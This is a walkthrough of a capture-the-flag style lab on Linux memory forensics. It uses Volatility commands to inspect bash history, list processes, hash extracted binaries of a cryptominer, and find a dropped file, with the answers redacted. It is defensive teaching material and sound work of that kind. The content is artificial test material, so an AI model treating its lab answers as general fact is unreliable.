Memory forensics CrypTOYminers Sing Volala-lala-latility
Learning Objectives
Understand what memory forensics is and how to use it in a digital forensics investigation
Understand what volatile data and memory dumps are
Learn about Volatility and how it can be used to analyse a memory dump
Learn about Volatility profiles
Memory forensics, also known as volatile memory analysis or random access memory (RAM) forensics, is a branch of digital forensics.
It involves the examination and analysis of a computer's volatile memory (RAM) to uncover digital evidence and artefacts related to computer security incidents, cybercrimes, and other forensic investigations.
This type of data is volatile because it will be deleted when the computer is turned off.
This room is again a very straightforward one with all commands and instructions already given. We just need to follow along and run them.
What is the exposed password that we find from the bash history output? Submit
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_bash
Volatility Foundation Volatility Framework 2.6.1
Pid Name Command Time Command
-------- ---- ----------------------------- -------
10205 bash 2023-10-02 18:19:58 UTC+0000 mysql -u root -p'REDACTED'
What is the PID of the miner process that we find?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_pslist
Volatility Foundation Volatility Framework 2.6.1
Offset Name Pid PPid Uid Gid DTB Start Time
------------------ ----------- ----- ---- ------- ---- ------ ------------------ ----
0xffff9ce9b1e4c680 REDACTED REDACTED 1 1000 1000 0x0000000074fa2000 2023-10-02 18:22:37 UTC+0000
0xffff9ce9bc23af00 mysqlserver 10291 1 1000 1000 0x000000006f166000 2023-10-02 18:22:37 UTC+0000
What is the MD5 hash of the miner process?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ md5sum extracted/miner.PID.0x400000
REDACTED extracted/miner.PID.0x400000
What is the MD5 hash of the mysqlserver process?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ md5sum extracted/mysqlserver.10291.0x400000
REDACTED extracted/mysqlserver.10291.0x400000
Use the command strings extracted/miner.<PID from question 2>.0x400000 | grep http://. What is the suspicious URL? (Fully defang the URL using CyberChef)
[REDACTED]
strings extracted/miner.<PID from question 2>.0x400000 | grep http://
After reading the elfie file, what location is the mysqlserver process dropped in on the file system?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_find_file -i 0xffff9ce9b78280e8 -O extracted/elfie
ubuntu@volatility:~/Desktop/Evidence$ cat extracted/elfie